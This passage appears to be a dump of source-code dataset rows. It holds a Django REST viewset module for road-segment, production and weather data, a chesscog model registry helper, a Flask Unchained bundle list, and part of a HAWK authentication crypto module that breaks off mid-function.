    """
    This viewset automatically provides "list", "create", "read", "update", "partial_update"
    and "destroy" actions.

    list: Returns all the elements. Road segments in this case.
    read: Retrieve a road segment. #ID of the road segment needed.
    update: Update a road segment. All fields are mandatory.
    partial_update: Update a road segment. No fields are mandatory.
    destroy: Request for deleting a road segment element.
    """
    pagination_class = StandardResultsSetPagination
    queryset = RoadSegment.objects.all()
    serializer_class = RoadSegmentSerializer
    # Anonymous users get read-only access; write operations require admin.
    permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsAdminOrReadOnly,)

    def create(self, request, *args, **kwargs):
        """
        Inputs a list of road segments.

        Accepts either a single JSON object or a list of objects.  The raw
        road network is cut into segments (bounded by MAX_SEGMENT_LENGTH and
        MIN_COORDINATES_LENGTH) before validation and persistence.
        """
        data = []
        # Check if the incoming data is a list
        # If it is a list set the many flag to True
        if isinstance(request.data, list):
            data = request.data
        else:
            data.append(request.data)
        # Split the incoming road network into bounded-length segments.
        segments = segment_network(data, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH)
        # Instantiate the serializer
        serializer = self.get_serializer(data=segments, many=True)
        # Check if the serializer is valid and takes the necessary actions
        if serializer.is_valid():
            serializer.save()
            headers = self.get_success_headers(serializer.data)
            return Response(serializer.data, status=status.HTTP_201_CREATED,
                            headers=headers)
        # If not valid return error
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ProductionDataViewSet(viewsets.ModelViewSet):
    """
    This viewset automatically provides "list", "create", "read", "update", "partial_update"
    and "destroy" actions.

    list: Returns all the elements. Production data in this case.
    read: Retrieve production data. #ID of the production needed.
    update: Updates one single production data. All fields are mandatory.
    partial_update: Updates one single production data. No fields are mandatory.
    destroy: Request for deleting a production data element.
    """
    queryset = ProductionData.objects.all()
    serializer_class = ProductionDataInputSerializer
    # Only registered users can use this view
    permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)

    def create(self, request, *args, **kwargs):
        """
        Input new production data. The data will be mapped to a road segment defined by set parameters.

        Pipeline: validate raw input, map each item to a road segment,
        resolve overlaps with previously stored production data, then save.
        """
        data = []
        # Check if the incoming data is a list
        # If it is a list set the many flag to True
        if isinstance(request.data, list):
            data = request.data
            # Reject oversized batches up front.
            if len(request.data) > INPUT_LIST_LIMIT:
                error = {"detail": "Input list too long"}
                return Response(error, status=status.HTTP_400_BAD_REQUEST)
        else:
            data.append(request.data)
        serializer = self.get_serializer(data=data, many=True)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        # Map production data to a road segment
        mapped_data = map_to_segment(data)
        # Check that there are successfully mapped prod-data.  Deliberately a
        # 200 (not an error): valid input that simply matched no segment.
        if len(mapped_data) == 0:
            error = {"detail": "No segments within range"}
            return Response(error, status=status.HTTP_200_OK)
        # Handle overlap with old prod-data
        mapped_data = handle_prod_data_overlap(mapped_data)
        # Instantiate the serializer
        serializer = ProductionDataSerializer(data=mapped_data, many=True)
        # Check if the serializer is valid and takes the necessary actions
        if serializer.is_valid():
            # Handle weather data when adding new production data
            weather.handle_prod_weather_overlap(serializer.validated_data)
            serializer.save()
            return Response(
                "{} row(s) added".format(len(serializer.data)),
                status=status.HTTP_201_CREATED,
            )
        # If not valid return error
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def list(self, request, *args, **kwargs):
        """Return all production data, serialized with the full output serializer."""
        queryset = self.get_queryset()
        serializer = ProductionDataSerializer(queryset, many=True)
        return Response(serializer.data)
class WeatherViewSet(viewsets.ModelViewSet):
    """
    list: Returns all the elements. Weather data in this case.
    read: Retrieve weather data. #ID of the weather needed.
    update: Updates one single weather data. All fields are mandatory.
    partial_update: Updates one single weather data. No fields are mandatory.
    destroy: Request for deleting a weather data element.
    """
    queryset = WeatherData.objects.all()
    serializer_class = WeatherDataInputSerializer
    # Only registered users can use this view
    permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)

    def list(self, request, *args, **kwargs):
        """Return all weather data, serialized with the full output serializer."""
        queryset = self.get_queryset()
        serializer = WeatherDataSerializer(queryset, many=True)
        return Response(serializer.data)

    def create(self, request, *args, **kwargs):
        """
        Create new weather data from list mapped to road segment
        """
        data = []
        if isinstance(request.data, list):
            data = request.data
            # Reject oversized batches up front.
            if len(request.data) > INPUT_LIST_LIMIT:
                error = {"detail": "Input list too long"}
                return Response(error, status=status.HTTP_400_BAD_REQUEST)
        else:
            data.append(request.data)
        serializer = self.get_serializer(data=data, many=True)
        # NOTE(review): with raise_exception=True, is_valid() raises on
        # invalid input, so the explicit error return below appears
        # unreachable -- confirm whether raising or returning is intended.
        if not serializer.is_valid(raise_exception=True):
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        # Map weather data to road a road segment
        number_of_updated_weather, mapped_weather = weather.map_weather_to_segment(data)
        # Instantiate the serializer
        serializer = WeatherDataSerializer(data=mapped_weather, many=True)
        # Check if the serializer is valid and takes the necessary actions
        if serializer.is_valid(raise_exception=True):
            serializer.save()
            return Response(
                "{} row(s) added and {} weather objects updated".format(len(serializer.data),
                                                                        number_of_updated_weather),
                status=status.HTTP_201_CREATED,
            )
        # If not valid return error
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SegmentStatusViewSet(viewsets.ReadOnlyModelViewSet):
    """
    Read only viewset for status on segments

    Joins each road segment with its weather rows and aggregates
    production-data activity flags via one raw SQL statement.
    """
    pagination_class = StandardResultsSetPagination
    # Default page size used by list() when the client supplies none.
    page_size = 100

    def get_queryset(self):
        """
        Django Rest Framework complains if this is not overridden
        """
        pass

    def get_queryset_custom(self, segment_id=None, page=None, page_size=None):
        """
        Custom method for getting the query data
        Uses raw sql as the query is a bit difficult to implement with django models
        :param segment_id: id of the segment for retrieve
        :param page: page number for list
        :param page_size: page size for list
        :return: When used by retrieve, a dictionary. When used by list, a list of dictionaries
        """
        with connection.cursor() as cursor:
            # NOTE(review): the statement has no ORDER BY, so row order (and
            # therefore LIMIT/OFFSET pagination) is database-dependent.
            stmt = """
            SELECT s.id, s.county, s.href, s.category, s.municipality, s.region,
            s.status, s.stretchdistance, s.typeofroad, s.roadsectionid, s.vrefshortform,
            (SELECT ST_AsText(s.the_geom)) AS the_geom,
            w.start_time_period, w.end_time_period,
            w.value, w.unit, w.degrees,
            (SELECT MAX(p.time) FROM api_productiondata AS p WHERE p.segment_id = s.id) AS time,
            (SELECT EXISTS
            (SELECT * FROM api_productiondata AS p
            WHERE p.segment_id = s.id AND p.dry_spreader_active = TRUE)) AS dry_spreader_active,
            (SELECT EXISTS
            (SELECT * FROM api_productiondata AS p
            WHERE p.segment_id = s.id AND p.plow_active = TRUE)) AS plow_active,
            (SELECT EXISTS
            (SELECT * FROM api_productiondata AS p
            WHERE p.segment_id = s.id AND p.wet_spreader_active = TRUE)) AS wet_spreader_active,
            (SELECT EXISTS
            (SELECT * FROM api_productiondata AS p
            WHERE p.segment_id = s.id AND p.brush_active = TRUE)) AS brush_active,
            (SELECT p.material_type_code
            FROM api_productiondata AS p
            WHERE p.segment_id = s.id ORDER BY p.material_type_code LIMIT 1) AS material_type_code
            FROM api_roadsegment AS s
            INNER JOIN api_weatherdata AS w ON s.id = w.segment_id
            """
            if segment_id is not None:
                # Retrieve path: single row keyed by segment id.
                where_clause = "WHERE s.id = %s"
                cursor.execute(stmt + where_clause, [segment_id])
                columns = [col[0] for col in cursor.description]
                # NOTE(review): fetchone() returns None for an unknown id,
                # which would make zip() raise TypeError -- confirm callers
                # only pass existing ids.
                rows = dict(zip(columns, cursor.fetchone()))
            else:
                # List path: paginate with LIMIT/OFFSET.
                if page is not None and page_size is not None:
                    pagination = "LIMIT %s OFFSET %s"
                    cursor.execute(stmt + pagination, [page_size, (int(page) - 1) * int(page_size)])
                else:
                    pagination = "LIMIT %s"
                    cursor.execute(stmt + pagination, [page_size])
                columns = [col[0] for col in cursor.description]
                rows = [dict(zip(columns, row)) for row in cursor.fetchall()]
        return rows

    def list(self, request, *args, **kwargs):
        """
        List all segments with status.
        Defaults to 100 segments
        Use: /api/road-status/?page=<page_number>&page_size<number_of_segments_per_page>
        """
        page = request.query_params.get("page", None)
        if request.query_params.get("page_size", None) is not None:
            page_size = request.query_params.get("page_size", None)
        else:
            page_size = self.page_size
        if page is not None and page_size is not None:
            return Response(self.get_queryset_custom(page=page, page_size=page_size))
        # NOTE(review): when no page is given, a client-supplied page_size is
        # ignored and the default self.page_size is used instead.
        return Response(self.get_queryset_custom(page_size=self.page_size))

    def retrieve(self, request, pk=None, *args, **kwargs):
        """
        Retrieve one segment with status from pk
        """
        return Response(self.get_queryset_custom(segment_id=pk))
| from django.db import connection
from rest_framework import permissions, status, viewsets
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from vapi.constants import INPUT_LIST_LIMIT, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH
from api.mapper.mapper import map_to_segment
from api.models import ProductionData, RoadSegment, WeatherData
from api.overlap_handler.overlap_handler import handle_prod_data_overlap
from api.permissions import IsAdminOrReadOnly, IsStaffOrCreateOnly
from api.segmenter.road_segmenter import segment_network
from api.serializers import (ProductionDataInputSerializer, ProductionDataSerializer,
RoadSegmentSerializer, WeatherDataInputSerializer,
WeatherDataSerializer)
from api.weather import weather
class StandardResultsSetPagination(PageNumberPagination):
page_size = 100
page_size_query_param = "page_size"
max_page_size = 1000
class RoadSegmentViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides "list", "create", "read", "update", "partial_update"
and "destroy" actions.
list: Returns all the elements. Road segments in this case.
read: Retrieve a road segment. #ID of the road segment needed.
update: Update a road segment. All fields are mandatory.
partial_update: Update a road segment. No fields are mandatory.
destroy: Request for deleting a road segment element.
"""
pagination_class = StandardResultsSetPagination
queryset = RoadSegment.objects.all()
serializer_class = RoadSegmentSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsAdminOrReadOnly,)
def create(self, request, *args, **kwargs):
"""
Inputs a list of road segments.
"""
data = []
# Check if the incoming data is a list
# If it is a list set the many flag to True
if isinstance(request.data, list):
data = request.data
else:
data.append(request.data)
# segment stuff here
segments = segment_network(data, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH)
# Instantiate the serializer
serializer = self.get_serializer(data=segments, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid():
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED,
headers=headers)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ProductionDataViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides "list", "create", "read", "update", "partial_update"
and "destroy" actions.
list: Returns all the elements. Production data in this case.
read: Retrieve production data. #ID of the production needed.
update: Updates one single production data. All fields are mandatory.
partial_update: Updates one single production data. No fields are mandatory.
destroy: Request for deleting a production data element.
"""
queryset = ProductionData.objects.all()
serializer_class = ProductionDataInputSerializer
# Only registered users can use this view
permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)
def create(self, request, *args, **kwargs):
"""
Input new production data. The data will be mapped to a road segment defined by set parameters.
"""
data = []
# Check if the incoming data is a list
# If it is a list set the many flag to True
if isinstance(request.data, list):
data = request.data
if len(request.data) > INPUT_LIST_LIMIT:
error = {"detail": "Input list too long"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
else:
data.append(request.data)
serializer = self.get_serializer(data=data, many=True)
if not serializer.is_valid():
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Map production data to a road segment
mapped_data = map_to_segment(data)
# Check that there are successfully mapped prod-data
if len(mapped_data) == 0:
error = {"detail": "No segments within range"}
return Response(error, status=status.HTTP_200_OK)
# Handle overlap with old prod-data
mapped_data = handle_prod_data_overlap(mapped_data)
# Instantiate the serializer
serializer = ProductionDataSerializer(data=mapped_data, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid():
# Handle weather data when adding new production data
weather.handle_prod_weather_overlap(serializer.validated_data)
serializer.save()
return Response(
"{} row(s) added".format(len(serializer.data)),
status=status.HTTP_201_CREATED,
)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def list(self, request, *args, **kwargs):
queryset = self.get_queryset()
serializer = ProductionDataSerializer(queryset, many=True)
return Response(serializer.data)
class WeatherViewSet(viewsets.ModelViewSet):
"""
list: Returns all the elements. Weather data in this case.
read: Retrieve weather data. #ID of the weather needed.
update: Updates one single weather data. All fields are mandatory.
partial_update: Updates one single weather data. No fields are mandatory.
destroy: Request for deleting a weather data element.
"""
queryset = WeatherData.objects.all()
serializer_class = WeatherDataInputSerializer
# Only registered users can use this view
permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)
def list(self, request, *args, **kwargs):
queryset = self.get_queryset()
serializer = WeatherDataSerializer(queryset, many=True)
return Response(serializer.data)
def create(self, request, *args, **kwargs):
"""
Create new weather data from list mapped to road segment
"""
data = []
if isinstance(request.data, list):
data = request.data
if len(request.data) > INPUT_LIST_LIMIT:
error = {"detail": "Input list too long"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
else:
data.append(request.data)
serializer = self.get_serializer(data=data, many=True)
if not serializer.is_valid(raise_exception=True):
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Map weather data to road a road segment
number_of_updated_weather, mapped_weather = weather.map_weather_to_segment(data)
# Instantiate the serializer
serializer = WeatherDataSerializer(data=mapped_weather, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(
"{} row(s) added and {} weather objects updated".format(len(serializer.data),
number_of_updated_weather),
status=status.HTTP_201_CREATED,
)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SegmentStatusViewSet(viewsets.ReadOnlyModelViewSet):
"""
Read only viewset for status on segments
"""
pagination_class = StandardResultsSetPagination
page_size = 100
def get_queryset(self):
"""
Django Rest Framework complains if this is not overridden
"""
pass
def get_queryset_custom(self, segment_id=None, page=None, page_size=None):
"""
Custom method for getting the query data
Uses raw sql as the query is a bit difficult to implement with django models
:param segment_id: id of the segment for retrieve
:param page: page number for list
:param page_size: page size for list
:return: When used by retrieve, a dictionary. When used by list, a list of dictionaries
"""
with connection.cursor() as cursor:
stmt = """
SELECT s.id, s.county, s.href, s.category, s.municipality, s.region,
s.status, s.stretchdistance, s.typeofroad, s.roadsectionid, s.vrefshortform,
(SELECT ST_AsText(s.the_geom)) AS the_geom,
w.start_time_period, w.end_time_period,
w.value, w.unit, w.degrees,
(SELECT MAX(p.time) FROM api_productiondata AS p WHERE p.segment_id = s.id) AS time,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.dry_spreader_active = TRUE)) AS dry_spreader_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.plow_active = TRUE)) AS plow_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.wet_spreader_active = TRUE)) AS wet_spreader_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.brush_active = TRUE)) AS brush_active,
(SELECT p.material_type_code
FROM api_productiondata AS p
WHERE p.segment_id = s.id ORDER BY p.material_type_code LIMIT 1) AS material_type_code
FROM api_roadsegment AS s
INNER JOIN api_weatherdata AS w ON s.id = w.segment_id
"""
if segment_id is not None:
where_clause = "WHERE s.id = %s"
cursor.execute(stmt + where_clause, [segment_id])
columns = [col[0] for col in cursor.description]
rows = dict(zip(columns, cursor.fetchone()))
else:
if page is not None and page_size is not None:
pagination = "LIMIT %s OFFSET %s"
cursor.execute(stmt + pagination, [page_size, (int(page) - 1) * int(page_size)])
else:
pagination = "LIMIT %s"
cursor.execute(stmt + pagination, [page_size])
columns = [col[0] for col in cursor.description]
rows = [dict(zip(columns, row)) for row in cursor.fetchall()]
return rows
def list(self, request, *args, **kwargs):
"""
List all segments with status.
Defaults to 100 segments
Use: /api/road-status/?page=<page_number>&page_size<number_of_segments_per_page>
"""
page = request.query_params.get("page", None)
if request.query_params.get("page_size", None) is not None:
page_size = request.query_params.get("page_size", None)
else:
page_size = self.page_size
if page is not None and page_size is not None:
return Response(self.get_queryset_custom(page=page, page_size=page_size))
return Response(self.get_queryset_custom(page_size=self.page_size))
def retrieve(self, request, pk=None, *args, **kwargs):
"""
Retrieve one segment with status from pk
"""
return Response(self.get_queryset_custom(segment_id=pk))
| en | 0.65753 | This viewset automatically provides "list", "create", "read", "update", "partial_update" and "destroy" actions. list: Returns all the elements. Road segments in this case. read: Retrieve a road segment. #ID of the road segment needed. update: Update a road segment. All fields are mandatory. partial_update: Update a road segment. No fields are mandatory. destroy: Request for deleting a road segment element. Inputs a list of road segments. # Check if the incoming data is a list # If it is a list set the many flag to True # segment stuff here # Instantiate the serializer # Check if the serializer is valid and takes the necessary actions # If not valid return error This viewset automatically provides "list", "create", "read", "update", "partial_update" and "destroy" actions. list: Returns all the elements. Production data in this case. read: Retrieve production data. #ID of the production needed. update: Updates one single production data. All fields are mandatory. partial_update: Updates one single production data. No fields are mandatory. destroy: Request for deleting a production data element. # Only registered users can use this view Input new production data. The data will be mapped to a road segment defined by set parameters. # Check if the incoming data is a list # If it is a list set the many flag to True # Map production data to a road segment # Check that there are successfully mapped prod-data # Handle overlap with old prod-data # Instantiate the serializer # Check if the serializer is valid and takes the necessary actions # Handle weather data when adding new production data # If not valid return error list: Returns all the elements. Weather data in this case. read: Retrieve weather data. #ID of the weather needed. update: Updates one single weather data. All fields are mandatory. partial_update: Updates one single weather data. No fields are mandatory. destroy: Request for deleting a weather data element. 
# Only registered users can use this view Create new weather data from list mapped to road segment # Map weather data to road a road segment # Instantiate the serializer # Check if the serializer is valid and takes the necessary actions # If not valid return error Read only viewset for status on segments Django Rest Framework complains if this is not overridden Custom method for getting the query data Uses raw sql as the query is a bit difficult to implement with django models :param segment_id: id of the segment for retrieve :param page: page number for list :param page_size: page size for list :return: When used by retrieve, a dictionary. When used by list, a list of dictionaries SELECT s.id, s.county, s.href, s.category, s.municipality, s.region, s.status, s.stretchdistance, s.typeofroad, s.roadsectionid, s.vrefshortform, (SELECT ST_AsText(s.the_geom)) AS the_geom, w.start_time_period, w.end_time_period, w.value, w.unit, w.degrees, (SELECT MAX(p.time) FROM api_productiondata AS p WHERE p.segment_id = s.id) AS time, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.dry_spreader_active = TRUE)) AS dry_spreader_active, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.plow_active = TRUE)) AS plow_active, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.wet_spreader_active = TRUE)) AS wet_spreader_active, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.brush_active = TRUE)) AS brush_active, (SELECT p.material_type_code FROM api_productiondata AS p WHERE p.segment_id = s.id ORDER BY p.material_type_code LIMIT 1) AS material_type_code FROM api_roadsegment AS s INNER JOIN api_weatherdata AS w ON s.id = w.segment_id List all segments with status. Defaults to 100 segments Use: /api/road-status/?page=<page_number>&page_size<number_of_segments_per_page> Retrieve one segment with status from pk | 2.206608 | 2 |
chesscog/core/models.py | MarinusHeindl/chesscog | 12 | 6614006 | """Common tasks related to models.
"""
from torch import nn
from recap import CfgNode as CN
from chesscog.core.registry import Registry
#: The global models registry; build_model() resolves models from it by
#: registry name and model name.
MODELS_REGISTRY = Registry()
def build_model(cfg: CN) -> nn.Module:
    """Instantiate the CNN described by a configuration.

    Looks up ``cfg.TRAINING.MODEL.NAME`` inside the registry named by
    ``cfg.TRAINING.MODEL.REGISTRY`` and calls the registered constructor
    with no arguments.

    Args:
        cfg (CN): the configuration

    Returns:
        nn.Module: the built CNN model
    """
    model_cfg = cfg.TRAINING.MODEL
    registry = MODELS_REGISTRY[model_cfg.REGISTRY]
    model_cls = registry[model_cfg.NAME]
    return model_cls()
| """Common tasks related to models.
"""
from torch import nn
from recap import CfgNode as CN
from chesscog.core.registry import Registry
#: The global models registry
MODELS_REGISTRY = Registry()
def build_model(cfg: CN) -> nn.Module:
"""Build a CNN from a configuration.
Args:
cfg (CN): the configuration
Returns:
nn.Module: the built CNN model
"""
model = cfg.TRAINING.MODEL
return MODELS_REGISTRY[model.REGISTRY][model.NAME]()
| en | 0.707706 | Common tasks related to models. #: The global models registry Build a CNN from a configuration. Args: cfg (CN): the configuration Returns: nn.Module: the built CNN model | 2.400745 | 2 |
unchained_config.py | codebyravi/flask-unchained-react-spa | 5 | 6614007 | BUNDLES = [
'flask_unchained.bundles.admin',
'flask_unchained.bundles.api',
'flask_unchained.bundles.mail',
'flask_unchained.bundles.celery', # must be after mail bundle to send async email
'flask_unchained.bundles.session',
'flask_unchained.bundles.sqlalchemy',
'py_yaml_fixtures',
'bundles.blog',
'bundles.security',
'backend', # app bundle must be last
]
| BUNDLES = [
'flask_unchained.bundles.admin',
'flask_unchained.bundles.api',
'flask_unchained.bundles.mail',
'flask_unchained.bundles.celery', # must be after mail bundle to send async email
'flask_unchained.bundles.session',
'flask_unchained.bundles.sqlalchemy',
'py_yaml_fixtures',
'bundles.blog',
'bundles.security',
'backend', # app bundle must be last
]
| en | 0.858478 | # must be after mail bundle to send async email # app bundle must be last | 1.076521 | 1 |
hawk/hcrypto.py | ludwigkraatz/PyHawk | 0 | 6614008 | # -*- coding: utf-8 -*-
"""
Crypto functions for HAWK authentication
"""
from base64 import b64encode, urlsafe_b64encode, urlsafe_b64decode
import hashlib
import hmac
import random
import string
from hawk.util import HawkException
HAWK_VER = 1
class UnknownAlgorithm(HawkException):
    """Exception raised for bad configuration of algorithm.

    Raised by module_for_algorithm for any algorithm other than 'sha256'.
    """
    pass
class InvalidBewit(HawkException):
    """Exception raised for invalid bewit value.

    Raised by explode_bewit when a decoded bewit does not contain exactly
    four backslash-separated fields.
    """
    pass
def calculate_mac(mac_type, credentials, options, url_encode=False):
    """Calculates a message authentication code (MAC).

    :param mac_type: HAWK envelope type (e.g. 'header', 'response',
        'bewit'); folded into the normalized string.
    :param credentials: dict with 'key' and 'algorithm' entries.
    :param options: artifact dict consumed by normalize_string (ts, nonce,
        method, resource, host, port, optional hash/ext/app/dlg).
    :param url_encode: when True the digest is URL-safe base64 encoded
        (used for bewits); otherwise standard base64.
    :return: the base64-encoded HMAC digest.

    NOTE(review): written for Python 2 -- on Python 3 hmac.new() requires
    a bytes key and message, so callers would need to encode first.
    """
    normalized = normalize_string(mac_type, options)
    digestmod = module_for_algorithm(credentials['algorithm'])
    result = hmac.new(credentials['key'], normalized, digestmod)
    if url_encode:
        mac = urlsafe_b64encode(result.digest())
    else:
        mac = b64encode(result.digest())
    return mac
def module_for_algorithm(algorithm):
    """Return the hashlib constructor matching *algorithm*.

    Only 'sha256' is supported; any other value raises UnknownAlgorithm.
    """
    if algorithm != 'sha256':
        raise UnknownAlgorithm
    return hashlib.sha256
def normalize_string(mac_type, options):
    """Serialize *mac_type* and *options* into the canonical HAWK v1 string.

    The result is the newline-terminated header used as HMAC input:
    version line, timestamp, nonce, upper-cased method, resource,
    lower-cased host, port, payload hash, then the optional ext / app /
    dlg trailers when present and non-empty.
    """
    # Normalize a missing or None payload hash to the empty string.  This
    # deliberately writes back into the caller-supplied dict.
    if 'hash' not in options or options['hash'] is None:
        options['hash'] = ''
    version_line = 'hawk.' + str(HAWK_VER) + '.' + mac_type
    fields = [
        version_line,
        str(options['ts']),
        options['nonce'],
        options['method'].upper(),
        options['resource'],
        options['host'].lower(),
        str(options['port']),
        options['hash'],
        '',  # forces the trailing newline after the hash field
    ]
    normalized = '\n'.join(fields)
    if 'ext' in options and len(options['ext']) > 0:
        # Escape backslashes and newlines so ext cannot break the framing.
        escaped_ext = options['ext'].replace('\\', '\\\\').replace('\n', '\\n')
        normalized += escaped_ext + '\n'
    if 'app' in options and options['app'] is not None and \
            len(options['app']) > 0:
        normalized += options['app'] + '\n'
    if 'dlg' in options and len(options['dlg']) > 0:
        normalized += options['dlg'] + '\n'
    return normalized
def calculate_payload_hash(payload, algorithm, content_type):
    """Calculates a hash for a given payload.

    Hashes the HAWK payload envelope: a version line, the normalized
    content type, and the payload itself, each newline-terminated.
    A falsy payload (None or '') hashes as the empty string.

    :param payload: raw request/response body.
    :param algorithm: hashlib algorithm name, e.g. 'sha256'.
    :param content_type: raw Content-Type header value (parameters are
        stripped by parse_content_type).
    :return: base64-encoded digest.

    NOTE(review): written for Python 2 -- on Python 3, hashlib update()
    requires bytes, so these str arguments would need encoding first.
    """
    p_hash = hashlib.new(algorithm)
    p_hash.update('hawk.' + str(HAWK_VER) + '.payload\n')
    p_hash.update(parse_content_type(content_type) + '\n')
    if payload:
        p_hash.update(payload)
    else:
        p_hash.update('')
    p_hash.update('\n')
    return b64encode(p_hash.digest())
def parse_content_type(content_type):
    """Return the lowercased media type with any parameters removed.

    'application/json; charset=utf-8' -> 'application/json'.
    Falsy input (None or '') yields the empty string.
    """
    if not content_type:
        return ''
    media_type, _, _params = content_type.partition(';')
    return media_type.strip().lower()
def calculate_ts_mac(ts, credentials):
    """Calculates a timestamp message authentication code for HAWK.

    :param ts: timestamp as a string.
    :param credentials: dict with 'key' and 'algorithm' entries.
    :return: base64-encoded HMAC over the 'hawk.<ver>.ts' envelope.

    NOTE(review): Python-2 era code -- on Python 3 hmac.new() requires a
    bytes key and message.
    """
    data = 'hawk.' + str(HAWK_VER) + '.ts\n' + ts + '\n'
    digestmod = module_for_algorithm(credentials['algorithm'])
    result = hmac.new(credentials['key'], data, digestmod)
    return b64encode(result.digest())
def random_string(length):
    """Generates a random string of lowercase ASCII letters.

    :param length: number of characters to generate.
    :return: a str of *length* random lowercase letters.

    Fix: the original used ``string.lowercase``, a Python-2-only,
    locale-dependent attribute that raises AttributeError on Python 3;
    ``string.ascii_lowercase`` exists on both majors with a fixed value.

    NOTE(review): ``random`` is not cryptographically secure; if these
    strings serve as nonces, consider the ``secrets`` module instead.
    """
    alphabet = string.ascii_lowercase
    return ''.join(random.choice(alphabet) for _ in range(length))
def calculate_bewit(credentials, artifacts, exp):
    """Calculates mac and formats a string for the bewit.

    Computes the 'bewit' MAC over *artifacts* (URL-safe encoded), packs
    ``id\\exp\\mac\\ext`` and URL-safe base64 encodes the whole thing.

    :param credentials: dict with at least 'id', 'key' and 'algorithm'.
    :param artifacts: artifact dict (must contain 'ext') fed to calculate_mac.
    :param exp: expiration timestamp; truncated to an integer.
    :return: URL-safe base64-encoded bewit token.
    """
    mac = calculate_mac('bewit', credentials, artifacts, True)
    # Construct bewit: id\exp\mac\ext
    bewit = '\\'.join([credentials['id'], str(int(exp)), mac, artifacts['ext']])
    return urlsafe_b64encode(bewit)
def explode_bewit(bewit):
    """Decodes a bewit and returns a dict of the parts.

    keys include: id, exp - expiration timestamp as integer, mac, ext

    :param bewit: URL-safe base64-encoded bewit token.
    :raises InvalidBewit: when the decoded value does not contain exactly
        four backslash-separated fields.

    Fixes: the Python-2-only ``print`` statement (a SyntaxError on
    Python 3) now uses the function form, and the base64 result is
    decoded to text so the backslash split works on Python 3 as well
    (on Python 2, where bytes is str, behavior is unchanged).
    """
    clear_b = urlsafe_b64decode(bewit)
    # On Python 3 urlsafe_b64decode returns bytes; normalize to text so the
    # split below and the returned fields are strings on both majors.
    if isinstance(clear_b, bytes) and not isinstance(clear_b, str):
        clear_b = clear_b.decode('utf-8')
    parts = clear_b.split('\\')
    if 4 != len(parts):
        print("Wrong number of bewit parts")
        raise InvalidBewit
    return {
        'id': parts[0],
        'exp': int(parts[1]),
        'mac': parts[2],
        'ext': parts[3]
    }
| # -*- coding: utf-8 -*-
"""
Crypto functions for HAWK authentication
"""
from base64 import b64encode, urlsafe_b64encode, urlsafe_b64decode
import hashlib
import hmac
import random
import string
from hawk.util import HawkException
HAWK_VER = 1
class UnknownAlgorithm(HawkException):
"""Exception raised for bad configuration of algorithm."""
pass
class InvalidBewit(HawkException):
"""Exception raised for invalid bewit value."""
pass
def calculate_mac(mac_type, credentials, options, url_encode=False):
"""Calculates a message authentication code (MAC)."""
normalized = normalize_string(mac_type, options)
digestmod = module_for_algorithm(credentials['algorithm'])
result = hmac.new(credentials['key'], normalized, digestmod)
if url_encode:
mac = urlsafe_b64encode(result.digest())
else:
mac = b64encode(result.digest())
return mac
def module_for_algorithm(algorithm):
"""Returns a hashlib algorithm based on given string."""
if 'sha256' == algorithm:
return hashlib.sha256
else:
raise UnknownAlgorithm
def normalize_string(mac_type, options):
"""Serializes mac_type and options into a HAWK string."""
# TODO this smells
if 'hash' not in options or options['hash'] is None:
options['hash'] = ''
normalized = '\n'.join(
['hawk.' + str(HAWK_VER) + '.' + mac_type,
str(options['ts']),
options['nonce'],
options['method'].upper(),
options['resource'],
options['host'].lower(),
str(options['port']),
options['hash']])
normalized += '\n'
if 'ext' in options and len(options['ext']) > 0:
n_ext = options['ext'].replace('\\', '\\\\').replace('\n', '\\n')
normalized += n_ext
normalized += '\n'
if 'app' in options and options['app'] is not None and \
len(options['app']) > 0:
normalized += options['app'] + '\n'
if 'dlg' in options and len(options['dlg']) > 0:
normalized += options['dlg'] + '\n'
return normalized
def calculate_payload_hash(payload, algorithm, content_type):
"""Calculates a hash for a given payload."""
p_hash = hashlib.new(algorithm)
p_hash.update('hawk.' + str(HAWK_VER) + '.payload\n')
p_hash.update(parse_content_type(content_type) + '\n')
if payload:
p_hash.update(payload)
else:
p_hash.update('')
p_hash.update('\n')
return b64encode(p_hash.digest())
def parse_content_type(content_type):
"""Cleans up content_type."""
if content_type:
